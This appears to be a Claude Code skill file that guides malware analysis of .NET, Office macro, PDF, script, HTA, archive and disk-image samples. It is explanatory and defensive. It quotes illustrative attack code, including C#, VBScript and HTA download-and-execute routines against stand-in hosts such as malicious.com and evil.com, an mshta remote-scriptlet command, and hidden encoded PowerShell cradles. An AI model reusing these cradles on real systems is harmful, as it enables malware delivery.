Malware-analysis-claude-skills specialized-file-analyzer

Analyze specialized file types beyond standard PE executables - .NET assemblies, Office macros, PDFs, PowerShell scripts, JavaScript, archives, HTA files, disk images (ISO/IMG/VHD/VHDX), and Linux ELF binaries. Use when you encounter documents, scripts, disk images, or non-Windows executables that require format-specific analysis tools and techniques.

install

source · Clone the upstream repo

git clone https://github.com/gl0bal01/malware-analysis-claude-skills

Claude Code · Install into ~/.claude/skills/

T=$(mktemp -d) && git clone --depth=1 https://github.com/gl0bal01/malware-analysis-claude-skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/specialized-file-analyzer" ~/.claude/skills/gl0bal01-malware-analysis-claude-skills-specialized-file-analyzer && rm -rf "$T"

manifest: specialized-file-analyzer/SKILL.md

source content

Specialized File Analyzer

Expert analysis of non-PE file formats commonly used in malware campaigns: .NET, Office documents, PDFs, scripts, HTA files, disk images, archives, and Linux binaries.

When to Use This Skill

Use this skill when analyzing:

.NET/C# assemblies (.exe, .dll with .NET framework)
Office documents with macros (.docm, .xlsm, .doc, .xls)
PDF files (suspicious attachments, exploit documents)
Scripts (PowerShell .ps1, VBScript .vbs, JavaScript .js)
HTA files (.hta — HTML Applications executed by mshta.exe)
Disk images (.iso, .img, .vhd, .vhdx — container formats that bypass MOTW)
Archives (.zip, .rar, .7z, .tar.gz)
Shortcuts (.lnk files)
Linux binaries (ELF executables)
Batch files (.bat, .cmd)

Key indicator: the `file` command reports something other than a native PE executable, such as a .NET assembly, document, script, archive, disk image, or ELF binary.

Quick File Type Identification

# Identify file type
file sample.bin

# Common outputs:
# "PE32+ console executable, for MS Windows" → Standard PE (use malware-triage)
# "PE32 executable (GUI) Intel 80386 Mono/.Net assembly" → .NET (use this skill)
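# "Composite Document File V2 Document" → Legacy Office (.doc/.xls), possible macros (use this skill)
# "Microsoft Word 2007+" → OOXML Office document (use this skill)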
# "PDF document, version 1.7" → PDF (use this skill)
# "HTML document text" → Check extension; if .hta → HTA (use this skill)
# "ISO 9660 CD-ROM filesystem data" → ISO image (use this skill)
# "DOS/MBR boot sector" → IMG disk image (use this skill)
# "Microsoft Disk Image" → VHD/VHDX (use this skill)
# "Zip archive data" → Archive (use this skill)
# "ELF 64-bit LSB executable" → Linux binary (use this skill)
# "ASCII text, with CRLF line terminators" → Script (use this skill)
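When the `file` utility is not available, the same first-pass triage can be approximated by checking magic bytes directly. The sketch below is illustrative only: `sniff` and the `MAGIC` table are hypothetical names, and the signature list is deliberately short.

```python
# Hypothetical helper: classify a sample by well-known magic bytes.
MAGIC = [
    (b"MZ", "PE (native or .NET)"),
    (b"%PDF", "PDF"),
    (b"PK\x03\x04", "ZIP container (archive or OOXML Office)"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound file (legacy Office)"),
    (b"\x7fELF", "ELF"),
    (b"vhdxfile", "VHDX"),
    (b"conectix", "VHD (dynamic; fixed VHDs keep this cookie in a footer)"),
]

def sniff(data: bytes) -> str:
    """Return a coarse label for the leading bytes of a file."""
    for magic, label in MAGIC:
        if data.startswith(magic):
            return label
    # ISO 9660 stores "CD001" in the volume descriptor at offset 0x8001.
    if data[0x8001:0x8006] == b"CD001":
        return "ISO 9660 image"
    return "unknown (possibly text or script)"
```

Reading the first 0x8010 bytes of a sample is enough for every check above, for example `sniff(open("sample.bin", "rb").read(0x8010))`.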

.NET / C# Assembly Analysis

Detection

# Check for .NET assembly
file sample.exe | grep "Mono/.Net assembly"

# Or check strings
strings sample.exe | grep "mscoree.dll"

# Check PE header
pe-parser sample.exe | grep "CLR Runtime"

Tool: dnSpy (Windows - Primary Tool)

Download: https://github.com/dnSpy/dnSpy

Workflow:

Open sample.exe in dnSpy
Navigate: Assembly Explorer → sample.exe → Namespace → Classes
Find entry point: Right-click assembly → Go to Entry Point

What to Look For:

Main() Function:

// Entry point - start here
public static void Main(string[] args)
{
    // Analyze execution flow
}

Suspicious Namespaces:

`System.Net` - Network operations (WebClient, HttpClient)
`System.Security.Cryptography` - Encryption/decryption
`System.Reflection` - Dynamic code loading
`System.Diagnostics.Process` - Process execution
`System.IO` - File operations
`Microsoft.Win32` - Registry access

Common Malicious Patterns:

// Download and execute
WebClient wc = new WebClient();
wc.DownloadFile("http://malicious.com/payload.exe", "C:\\temp\\payload.exe");
Process.Start("C:\\temp\\payload.exe");

// Base64 decode embedded payload
byte[] decoded = Convert.FromBase64String(encodedPayload);

// Reflective loading (rawAssembly is a byte[] holding the decoded payload)
Assembly asm = Assembly.Load(rawAssembly);

// Process injection
WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, out lpNumberOfBytesWritten);

Extract Embedded Resources:

Assembly Explorer → Right-click assembly → Resources
Look for:
- Embedded executables (byte arrays)
- Encrypted payloads
- Configuration data
- Icons (may hide data)

Right-click resource → Save

Deobfuscation:

# Using de4dot (automated deobfuscator)
de4dot sample.exe -o sample_deobfuscated.exe

# Handles common obfuscators:
# - ConfuserEx
# - .NET Reactor
# - Eazfuscator
# - Agile.NET

Dynamic Debugging:

dnSpy: Debug → Start Debugging (F5)
Set breakpoints on suspicious functions
Step through execution (F10/F11)
Watch variables and decrypted strings

Tool: ILSpy (Cross-platform Alternative)

# Command-line decompilation
ilspycmd sample.exe -o output_directory/

# GUI version (ILSpy itself is Windows-only; AvaloniaILSpy is the Linux/macOS port)
ilspy sample.exe

Export decompiled code:

File → Save Code → C# Project

Analysis Checklist - .NET

Entry point identified (Main function)
Obfuscation detected and removed (if needed)
Embedded resources extracted
Network URLs/IPs extracted
Crypto keys identified
Anti-analysis checks found
Payload execution method documented
IOCs extracted (URLs, IPs, file paths)

Office Document / Macro Analysis

Detection

# Macro-enabled formats
# .docm, .xlsm, .pptm → Office 2007+ with macros
# .doc, .xls, .ppt → Legacy Office (97-2003) with macros

file document.docm
# Output: "Microsoft Word 2007+"

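# Quick macro check
# .docm/.xlsm are ZIP containers: look for the VBA project part
unzip -l document.docm | grep -i "vbaProject.bin"
# Legacy .doc/.xls: a rough strings check can surface VBA keywords
strings document.doc | grep -i "vba\|macro\|autoopen"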

Tool: oledump.py (Primary - Didier Stevens)

Installation:

wget https://didierstevens.com/files/software/oledump_V0_0_70.zip
unzip oledump_V0_0_70.zip

Workflow:

1. List Streams:

python oledump.py document.docm

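# Example output (legacy .doc; for .docm the indexes carry a letter prefix such as A3):
#  1:       114 '\x01CompObj'
#  2:      4096 '\x05DocumentSummaryInformation'
#  3: M    8192 'Macros/VBA/ThisDocument'  ← M = module contains macro code
#  4:      1024 'Macros/VBA/_VBA_PROJECT'
#  5: M    4096 'Macros/VBA/Module1'
# A lowercase m marks a module that holds only attribute statements.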

2. Extract Macro Code:

# Extract macro from stream 3
python oledump.py -s 3 -v document.docm

# Decompress corrupted VBA
python oledump.py -s 3 --vbadecompresscorrupt document.docm

# Save to file
python oledump.py -s 3 -v document.docm > extracted_macro.vba

3. Analyze Macro Code:

Look for Auto-Execution Functions:

Sub AutoOpen()          ' Word - runs on document open
Sub Document_Open()     ' Word - runs on document open
Sub Workbook_Open()     ' Excel - runs on workbook open
Sub Auto_Open()         ' Excel - runs on workbook open

Look for Suspicious VBA Functions:

' Command execution
Shell("cmd.exe /c powershell ...")
CreateObject("WScript.Shell").Run "..."

' File download
CreateObject("MSXML2.XMLHTTP")
URLDownloadToFile ...

' File system operations
CreateObject("Scripting.FileSystemObject")

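' Dynamic code execution
Application.Run "MacroName"
CallByName obj, "MethodName", VbMethod
ExecuteExcel4Macro "..."
' (Execute, ExecuteGlobal and Eval are VBScript features, not VBA)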

Tool: olevba (oletools Suite)

Installation:

pip install oletools

Automated Analysis:

# Comprehensive analysis
olevba document.docm

# Decode obfuscated strings
olevba --decode document.docm

# JSON output for parsing
olevba -j document.docm > analysis.json

# Extract IOCs only
olevba --decode document.docm | grep -E "http|https|powershell|cmd|wscript"

Output Interpretation:

AutoExec - Auto-execution keywords found
Suspicious - Suspicious VBA keywords
IOCs - URLs, IPs, file paths
Hex Strings - Encoded data
Base64 Strings - Encoded payloads
Dridex Strings - Dridex malware indicators

Excel 4.0 Macros (XLM Macros)

XLM macros are stored in worksheet cells rather than in a VBA project, so VBA-focused tooling often misses them.

# Detect XLM macros
python oledump.py document.xls | grep XL

# Extract with XLMMacroDeobfuscator
# Source: https://github.com/DissectMalware/XLMMacroDeobfuscator
pip install XLMMacroDeobfuscator
xlmdeobfuscator --file document.xls

# Or use olevba
olevba document.xls --deobf

Modern Office Documents (.docx, .xlsx) - No Macros

Template Injection Attack:

# Extract Office Open XML structure
unzip document.docx -d extracted/

# Check for external template (Word stores the attachedTemplate relationship in settings.xml.rels)
grep -H 'TargetMode="External"' extracted/word/_rels/*.rels

# Look for:
# <Relationship Type="http://schemas.../attachedTemplate"
#              Target="http://malicious.com/template.dotm" TargetMode="External"/>
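The relationship check can also be scripted so that every `.rels` part is covered without unpacking the document to disk. This is a minimal sketch using only the standard library; `external_targets` is a hypothetical name, and for untrusted input a hardened XML parser would be a safer choice than `xml.etree`.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

def external_targets(docx_bytes: bytes):
    """Return (part name, relationship type, target) for each external relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter():
                if rel.get("TargetMode") == "External":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel_type, rel.get("Target")))
    return hits
```

An `attachedTemplate` entry that points at a remote `.dotm` is the template injection indicator described above; external `hyperlink` entries are common and usually benign.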

Embedded Objects:

# Check for embedded files
ls extracted/word/embeddings/

# Analyze embedded objects
file extracted/word/embeddings/*

Analysis Checklist - Office Documents

Macro presence confirmed
All macro streams extracted
Auto-execution functions identified
Obfuscated strings decoded
Download URLs extracted
Payload execution method documented
External template checked (.docx/.xlsx)
Embedded objects analyzed
IOCs extracted and defanged
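Defanging, the last checklist item, can be automated so that IOCs pasted into reports are not clickable. The function below is a simple sketch, not a standard; `defang` is a hypothetical helper and it rewrites every dot, including those in the URL path.

```python
import re

def defang(ioc: str) -> str:
    """Rewrite a URL, domain, or IP so it cannot be clicked or auto-linked."""
    ioc = re.sub(r"^http", "hxxp", ioc, flags=re.IGNORECASE)
    return ioc.replace(".", "[.]")
```

For example, `defang("http://evil.com/payload.exe")` yields `hxxp://evil[.]com/payload[.]exe`.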

PDF Analysis

Detection

file document.pdf
# Output: "PDF document, version 1.7"

Tool: pdfid.py (Didier Stevens)

Quick Triage:

python pdfid.py document.pdf

# Red flags:
# /OpenAction   - Executes action on open
# /AA           - Additional actions (auto-execute)
# /JavaScript   - Embedded JavaScript
# /JS           - JavaScript (short form)
# /Launch       - Launch external program
# /EmbeddedFile - Embedded files
# /RichMedia    - Flash/multimedia content
# /ObjStm       - Object streams (can hide malicious content)

Example Output:

PDFiD 0.2.7 document.pdf
 PDF Header: %PDF-1.7
 obj                   45
 endobj                45
 stream                12
 endstream             12
 /Page                  5
 /Encrypt               0
 /ObjStm                0
 /JS                    3  ← Suspicious!
 /JavaScript            2  ← Suspicious!
 /AA                    1  ← Auto-action present!
 /OpenAction            1  ← Executes on open!
 /Launch                0
 /EmbeddedFile          0
 /RichMedia             0
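The keyword counting that pdfid performs can be approximated in a few lines, which helps explain why hex-escaped names such as `/J#61vaScript` still count as `/JavaScript`. This is a rough sketch and not pdfid's actual implementation; `count_keywords` and `normalize_names` are hypothetical names, and the normalization is applied to the whole file for simplicity.

```python
import re

KEYWORDS = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch",
            b"/EmbeddedFile", b"/RichMedia", b"/ObjStm"]

def normalize_names(data: bytes) -> bytes:
    """Undo #xx hex escapes in PDF names (e.g. /J#61vaScript -> /JavaScript)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)

def count_keywords(data: bytes) -> dict:
    """Count occurrences of each triage keyword in the raw PDF bytes."""
    data = normalize_names(data)
    counts = {}
    for kw in KEYWORDS:
        # Require a non-alphanumeric byte after the keyword so /JS does not match /JSON.
        pattern = re.escape(kw) + rb"(?![A-Za-z0-9])"
        counts[kw.decode()] = len(re.findall(pattern, data))
    return counts
```

Keywords hidden inside compressed object streams are not visible to a scan like this, which is why a non-zero `/ObjStm` count deserves a closer look.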

Tool: pdf-parser.py (Didier Stevens)

Extract JavaScript:

# Search for JavaScript objects
python pdf-parser.py --search javascript document.pdf

# Extract specific object
python pdf-parser.py --object 15 document.pdf

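# Dump decoded JavaScript stream content (--filter decompresses the stream, --raw prints it unescaped)
python pdf-parser.py --object 15 --filter --raw document.pdf > extracted_js.txt

# Decompress every stream in the file
python pdf-parser.py --filter --raw document.pdf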

Tool: peepdf (Interactive Analysis)

# Install (peepdf-3 is the Python 3 compatible fork)
pip install peepdf-3

# Interactive mode
peepdf -i document.pdf

# Commands in interactive shell:
> tree             # Show object structure
> object 15        # Inspect object 15
> stream 15        # View stream 15
> extract js       # Extract all JavaScript
> stream 15 > payload.bin   # Save decoded stream 15 to a file

PDF Exploits

Common CVEs:

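CVE-2013-2729 - Adobe Reader integer overflow in embedded BMP (RLE) image parsing
CVE-2010-0188 - libtiff buffer overflow
CVE-2009-0927 - Adobe Reader Collab.getIcon() stack buffer overflow
CVE-2009-0658 - Adobe Reader JBIG2Decode buffer overflow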
CVE-2023-21608 - Adobe Acrobat use-after-free (remote code execution)
CVE-2023-26369 - Adobe Acrobat out-of-bounds write (actively exploited in the wild)
CVE-2024-4367 - PDF.js arbitrary JavaScript execution in Firefox (affects web-based PDF viewers)
CVE-2023-36664 - Ghostscript command injection via crafted PDF (affects Linux/server-side rendering)

Shellcode Detection:

# Look for NOP sleds in decoded streams (grep -E does not interpret \x escapes; use -P on raw bytes)
python pdf-parser.py --filter --raw document.pdf | LC_ALL=C grep -caP '\x90{10,}'

# Extract suspicious streams
python pdf-parser.py --object <id> --raw document.pdf | hexdump -C

Analysis Checklist - PDF

pdfid scan completed (flags identified)
JavaScript extracted (if present)
Embedded files extracted
Auto-action mechanism documented
Shellcode indicators checked
CVE exploitation checked (if relevant)
URLs/IPs extracted from JS
IOCs documented

PowerShell / Script Analysis

PowerShell (.ps1) Deobfuscation

Common Obfuscation Patterns:

Base64 Encoding:

# Encoded command execution
powershell.exe -EncodedCommand <base64_string>

# Decode manually
$encoded = "Base64StringHere"
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
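The same decoding works outside PowerShell, which avoids touching a Windows host at all. The sketch below relies on the fact that `-EncodedCommand` payloads are Base64 over UTF-16LE text; `decode_encoded_command` is a hypothetical helper name.

```python
import base64

def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE)."""
    return base64.b64decode(b64).decode("utf-16-le")
```

For example, `decode_encoded_command("dwBoAG8AYQBtAGkA")` returns `whoami`.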

String Concatenation:

$url = "ht" + "tp://" + "evil.com"

Compression:

$bytes = [Convert]::FromBase64String($compressed)
$ms = New-Object IO.MemoryStream(,$bytes)
$cs = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
$sr = New-Object IO.StreamReader($cs)
$sr.ReadToEnd()   # malware usually pipes this into Invoke-Expression
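A Base64 plus GZip wrapper like this can be reversed offline without running any PowerShell. This is a minimal sketch; `unpack_gzip_b64` is a hypothetical name and it assumes the blob really is GZip, not raw Deflate.

```python
import base64
import gzip

def unpack_gzip_b64(blob: str) -> bytes:
    """Reverse a Base64 + GZip wrapper and return the inner payload bytes."""
    return gzip.decompress(base64.b64decode(blob))

# Samples that use DeflateStream instead of GZipStream need raw-deflate decoding:
# zlib.decompress(base64.b64decode(blob), -15)
```

The result is often another script layer, so repeat the deobfuscation steps on the output.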

Tool: PSDecode

# Install
git clone https://github.com/R3MRUM/PSDecode

# Deobfuscate PowerShell (PSDecode runs the script with key cmdlets overridden, so use an isolated VM)
Import-Module .\PSDecode\PSDecode.psm1
PSDecode .\malicious.ps1

Manual Analysis:

# Read script without executing
Get-Content malicious.ps1

# Search for key indicators
Select-String -Path malicious.ps1 -Pattern "Invoke-Expression|IEX|DownloadString|DownloadFile|FromBase64String"

Suspicious PowerShell Patterns:

`Invoke-Expression` / `IEX` - Execute string as code
`Invoke-WebRequest` / `Invoke-RestMethod` - Download content
`DownloadString` / `DownloadFile` - Download payloads
`FromBase64String` - Decode embedded payload
`IO.Compression.GZipStream` - Decompress payload
`[Reflection.Assembly]::Load` - Load assembly from memory
`-EncodedCommand` - Base64 encoded command
`-WindowStyle Hidden` - Hide window
`-ExecutionPolicy Bypass` - Bypass script execution policy

VBScript (.vbs) Analysis

Common Obfuscation Techniques:

Chr() Concatenation:

' Characters assembled from ASCII codes to hide strings
Dim cmd
cmd = Chr(99) & Chr(109) & Chr(100)   ' = "cmd"
CreateObject("WScript.Shell").Run cmd & ".exe /c " & Chr(112) & Chr(105) & Chr(110) & Chr(103) & " evil.com"

Execute / ExecuteGlobal:

' Execute() runs a string as code in the current scope
' ExecuteGlobal() runs a string as code in the global scope
Dim payload
payload = "CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ").Run " & Chr(34) & "calc.exe" & Chr(34)
Execute(payload)

' Chained: decode then execute (Base64Decode is a helper the script defines itself; VBScript has no built-in)
ExecuteGlobal(Base64Decode(encodedPayload))

String Reversal with StrReverse:

' String stored backwards to evade signature detection
Dim hidden
hidden = "imaohw c/ exe.dmc"   ' StrReverse gives "cmd.exe /c whoami"
CreateObject("WScript.Shell").Run StrReverse(hidden)

Replace() Chains:

' Junk characters inserted and stripped at runtime
Dim url
url = "hXXXtXXXtXXXpXXX:XXX//evil.com/payload.exe"
url = Replace(url, "XXX", "")   ' = "http://evil.com/payload.exe"

WScript.Shell via GetObject:

' Alternative to CreateObject — avoids direct string "WScript.Shell"
Set sh = GetObject("new:{72C24DD5-D70A-438B-8A42-98424B88AFB8}")
sh.Run "powershell -nop -w hidden -enc <base64>"

Deobfuscation Approach:

Manual Chr() Resolution:

# Extract all Chr() calls and resolve them
grep -oE "Chr\([0-9]+\)" malicious.vbs | sort -u

# Python one-liner to resolve every Chr() value found in the script
python3 -c "
import re, sys
code = open('malicious.vbs').read()
for m in re.finditer(r'Chr\((\d+)\)', code):
    print(f'Chr({m.group(1)}) = {chr(int(m.group(1)))}')
"
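Resolving single `Chr()` calls still leaves the analyst to reassemble the strings by hand. A small extension is to fold each `Chr(n) & Chr(m) & ...` run into the literal it builds. The sketch below is one way to do that; `fold_chr_runs` is a hypothetical helper and it does not handle `ChrW()` or arithmetic inside the parentheses.

```python
import re

# One or more Chr(n) calls joined by the VBScript concatenation operator.
CHR_RUN = re.compile(r"Chr\(\d+\)(?:\s*&\s*Chr\(\d+\))*", re.IGNORECASE)

def fold_chr_runs(vbs: str) -> str:
    """Replace each run of Chr(n) & Chr(m) ... with the quoted string it builds."""
    def repl(match):
        codes = re.findall(r"\d+", match.group(0))
        text = "".join(chr(int(code)) for code in codes)
        # Double any embedded quote so the result stays valid VBScript.
        return '"' + text.replace('"', '""') + '"'
    return CHR_RUN.sub(repl, vbs)
```

Applied to `cmd = Chr(99) & Chr(109) & Chr(100)`, this returns `cmd = "cmd"`.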

Extract Execute() Payloads:

' SAFE deobfuscation technique:
' Replace Execute() / ExecuteGlobal() with WScript.Echo() to print payload instead of running it
' Original:
Execute(decodedPayload)
' Change to:
WScript.Echo(decodedPayload)

' Then run in a safe environment to reveal the next stage
cscript /nologo malicious_safe.vbs

Variable Substitution Tracing:

# Trace variable assignments to follow payload construction
grep -n "=" malicious.vbs | grep -v "'.*="   # exclude comments
# Follow each variable from assignment to use, reconstructing the final value

Key Suspicious Patterns:

`CreateObject("WScript.Shell")` - Execute OS commands, launch processes
`GetObject("winmgmts:")` - WMI access (process creation, system enumeration)
`Shell.Application` - Explorer shell invocation (can bypass some restrictions)
`ADODB.Stream` - Binary file writes (used to drop PE payloads to disk)
`MSXML2.XMLHTTP` / `WinHttp.WinHttpRequest` - HTTP download cradles
`Scripting.FileSystemObject` - File system reads and writes
`Execute` / `ExecuteGlobal` / `Eval` - Dynamic code execution (always deobfuscate before analyzing)
`StrReverse` / `Chr()` / `Replace()` - String obfuscation primitives

Analysis:

# Read script
cat malicious.vbs

# Search for high-priority patterns
grep -i "CreateObject\|WScript.Shell\|MSXML2.XMLHTTP\|Eval\|Execute\|ExecuteGlobal\|ADODB.Stream\|GetObject\|StrReverse" malicious.vbs

# Deobfuscate: Replace Eval() / Execute() with WScript.Echo() to print instead of execute
# Then run safely: cscript /nologo malicious_safe.vbs

JavaScript (.js) Analysis

# Beautify obfuscated JS
js-beautify malicious.js > beautified.js

# Online: https://beautifier.io/

Suspicious Patterns:

// Code execution
eval(encodedCode);

// Decode strings
unescape("%75%6E%65%73%63%61%70%65");
decodeURIComponent("%20");

// ActiveX (Windows COM objects)
var shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd.exe /c ...");

// WScript objects
var fso = new ActiveXObject("Scripting.FileSystemObject");

Analysis Checklist - Scripts

Script type identified (PS1, VBS, JS, BAT)
Obfuscation detected and removed
Base64/encoded strings decoded
Download URLs extracted
Execution commands documented
Dropped file paths identified
IOCs extracted (URLs, IPs, domains)

Archive Analysis

Safe Inspection (No Extraction)

# List contents without extracting
7z l archive.zip
unzip -l archive.zip
tar -tzf archive.tar.gz
rar l archive.rar

# Look for red flags:
# - Double extensions (invoice.pdf.exe)
# - Executable files (.exe, .scr, .com, .bat, .vbs)
# - LNK files (shortcuts)
# - Deeply nested archives (archive.zip -> archive2.zip -> payload.exe)
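The red flags above can be checked programmatically from the ZIP central directory, again without extracting anything. This is a sketch under simple assumptions: `flag_members` is a hypothetical helper, and the extension lists are illustrative, not exhaustive.

```python
import io
import zipfile

RISKY = (".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta", ".lnk", ".ps1")
ARCHIVES = (".zip", ".rar", ".7z", ".iso", ".img", ".vhd", ".vhdx")
DECOYS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt")

def flag_members(zip_bytes: bytes):
    """List (name, reasons) for suspicious members without extracting them."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            reasons = []
            if lower.endswith(RISKY):
                reasons.append("executable or script")
                # invoice.pdf.exe: a decoy extension sits in front of the real one.
                if lower.rsplit(".", 1)[0].endswith(DECOYS):
                    reasons.append("double extension")
            if lower.endswith(ARCHIVES):
                reasons.append("nested container")
            if reasons:
                flagged.append((name, reasons))
    return flagged
```

Only ZIP is covered here; RAR and 7z listings still need `rar l` or `7z l` as shown above.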

Extract Safely

# Create isolated directory
mkdir /tmp/extracted_archive
cd /tmp/extracted_archive

# Extract
7z x ../archive.zip
unzip ../archive.zip
tar -xzf ../archive.tar.gz

# Immediately check file types
file *

Password-Protected Archives

Common passwords in malware:

`infected`
`malware`
`virus`
`2024` / `2025`
`123456`

# Extract with password
7z x -pinfected archive.zip
unzip -P infected archive.zip

LNK (Shortcut) File Analysis

Tool: LECmd (Windows)

# Download from: https://ericzimmerman.github.io/
LECmd.exe -f malicious.lnk

Tool: lnkinfo (Linux)

lnkinfo malicious.lnk

# Look for:
# - Target path (what it executes)
# - Command-line arguments
# - Working directory
# - Icon location (may reveal payload location)

Manual Strings Analysis:

strings malicious.lnk | grep -E "\.exe|\.dll|http|powershell|cmd"

Analysis Checklist - Archives

Contents listed without extraction
File extensions verified (no double extensions)
Files extracted to isolated directory
All extracted files typed (file command)
LNK files analyzed (if present)
Nested archives checked
Password documented (if applicable)

HTA (HTML Application) Analysis

What HTA Files Are

HTA files (`.hta`) are HTML documents executed by `mshta.exe` (Microsoft HTML Application Host) rather than a web browser. HTAs run as fully trusted applications with the privileges of the current user, so they have unrestricted access to COM objects, ActiveX controls, and the local file system; none of the browser sandbox restrictions apply. Because mshta.exe is a signed Windows binary, it also acts as a trusted proxy for running attacker-supplied script. This makes HTAs a popular delivery vehicle for malware, often distributed via phishing emails or dropped inside ISO/ZIP archives.

MITRE ATT&CK: T1218.005 — System Binary Proxy Execution: Mshta

Detection

# File identification
file suspicious.hta
# Output: "HTML document text" (always verify the extension separately)

# Quick check for execution indicators
strings suspicious.hta | grep -iE "mshta|WScript|Shell|ActiveX|XMLHTTP|powershell"

Analysis Approach

HTAs are plain text — open them in any text editor or IDE. The analysis goal is to extract and understand all embedded scripts before any execution occurs.

1. Extract Embedded Scripts

# View raw content
cat suspicious.hta

# Grep for script blocks
grep -i "<script" suspicious.hta

# Pull out VBScript/JScript content between script tags (case-insensitive, 50 lines of context)
grep -i -A 50 "<script" suspicious.hta

2. Check for ActiveX Object Instantiation

ActiveX objects are the primary attack surface in HTAs. Flag every `CreateObject` and `new ActiveXObject` call:

' VBScript - common ActiveX patterns
Set sh  = CreateObject("WScript.Shell")               ' OS command execution
Set fso = CreateObject("Scripting.FileSystemObject")  ' File I/O
Set xhr = CreateObject("MSXML2.XMLHTTP")               ' HTTP download
Set xhr = CreateObject("WinHttp.WinHttpRequest.5.1")  ' Alternative HTTP

// JScript - equivalent patterns
var sh  = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var xhr = new ActiveXObject("MSXML2.XMLHTTP");

3. Look for High-Priority Execution Sinks

grep -iE "Shell\.Run|ShellExecute|WScript\.Shell|Scripting\.FileSystemObject|XMLHTTP|WinHttp|powershell|cmd\.exe|wscript|cscript|regsvr32|rundll32|msiexec" suspicious.hta

4. Decode Obfuscated Payloads

HTA malware frequently encodes payloads in `innerHTML`, script variables, or injected DOM content:

# Find base64 strings (look for long alphanum strings)
grep -oE "[A-Za-z0-9+/]{40,}={0,2}" suspicious.hta

# Find HTML-entity or percent-encoded strings
grep -oE "&#[0-9]+;" suspicious.hta
grep -oE "%[0-9A-Fa-f]{2}" suspicious.hta

Decode base64 payload (Linux):

echo "Base64StringHere" | base64 -d > decoded_payload.bin
file decoded_payload.bin

Decode base64 payload (PowerShell — for Unicode-encoded commands):

[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("Base64StringHere"))

Common Malware Patterns

Download-and-Execute via XMLHTTP:

Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", "http://malicious[.]com/payload.exe", False
xhr.Send
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1   ' Binary
stream.Open
stream.Write xhr.responseBody
stream.SaveToFile "C:\Users\Public\payload.exe", 2
stream.Close
CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe"

PowerShell Invocation (common cradle):

CreateObject("WScript.Shell").Run "powershell -nop -w hidden -enc <base64>", 0, False

Payload hidden in innerHTML and read back at runtime:

<div id="data" style="display:none">TVqQAAMAAAAEAAAA...</div>
<script language="VBScript">
  Dim raw
  raw = document.getElementById("data").innerHTML
  ' decode and execute raw
</script>
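A hidden element whose text starts with `TVqQ` is a strong hint: those characters are the Base64 form of the `MZ\x90` bytes that open most PE files. The check can be sketched as follows; `looks_like_pe` is a hypothetical helper and it inspects only the first few Base64 groups.

```python
import base64

def looks_like_pe(b64_text: str) -> bool:
    """True when a Base64 blob decodes to data starting with the 'MZ' DOS header."""
    cleaned = "".join(b64_text.split())   # drop whitespace and line breaks
    head = cleaned[:8]
    head = head[: len(head) // 4 * 4]     # keep whole 4-character groups only
    return base64.b64decode(head)[:2] == b"MZ"
```

When it returns true, decode the full blob to a file and route it through the PE analysis path.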

mshta.exe executing inline script (seen in phishing URLs):

mshta.exe javascript:a=(GetObject("script:http://malicious[.]com/payload.sct")).Exec();close();

Tools

Task	Tool
Read/edit HTA content	Any text editor (VS Code, Notepad++, vim)
DOM structure inspection	Browser dev tools (open as HTML — do NOT click Run)
Decode base64 strings	`base64 -d` (Linux), CyberChef
Chr()/VBS deobfuscation	Manual or `cscript` with Execute→Echo swap (see VBScript section)
Trace COM object calls	Process Monitor (filter on mshta.exe) — dynamic analysis VM only

Analysis Checklist - HTA

File opened as plain text — script language identified (VBScript / JScript / mixed)
All `CreateObject` / `new ActiveXObject` calls enumerated
`Shell.Run` / `ShellExecute` arguments extracted
Download URLs identified (XMLHTTP, WinHttp, URLDownloadToFile)
Encoded payloads (base64, Chr(), HTML entities) decoded
innerHTML / injected DOM payload sources checked
Dropped file paths documented
IOCs extracted and defanged

Disk Image Analysis (ISO / IMG / VHD / VHDX)

Why Malware Uses Disk Images

Disk images are a primary MOTW (Mark-of-the-Web) bypass technique on Windows 10 and 11. When a file is downloaded from the internet, Windows attaches a Zone Identifier alternate data stream (`Zone.Identifier:$DATA`, Zone 3) to flag it as untrusted. Files extracted from a mounted disk image do not inherit the source image's MOTW, so payloads inside an ISO/VHD execute without SmartScreen prompts or Protected View restrictions.

Additionally, `.iso` files auto-mount as a virtual DVD drive on double-click in Windows 10+, and `.vhd` / `.vhdx` files auto-mount as a virtual disk, making the delivery seamless for the victim.

MITRE ATT&CK: T1553.005 — Subvert Trust Controls: Mark-of-the-Web Bypass
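The Zone Identifier stream is a small INI-style text, so its presence and contents are easy to document in a report. The sketch below parses that text; `parse_zone_identifier` is a hypothetical helper, and reading the stream itself (for example by opening `sample.iso:Zone.Identifier` on an NTFS volume) is left to the caller.

```python
import configparser

ZONES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
         3: "Internet", 4: "Restricted sites"}

def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style content of a Zone.Identifier alternate data stream."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str   # keep key case (ZoneId, HostUrl) as written
    cp.read_string(text)
    info = dict(cp["ZoneTransfer"])
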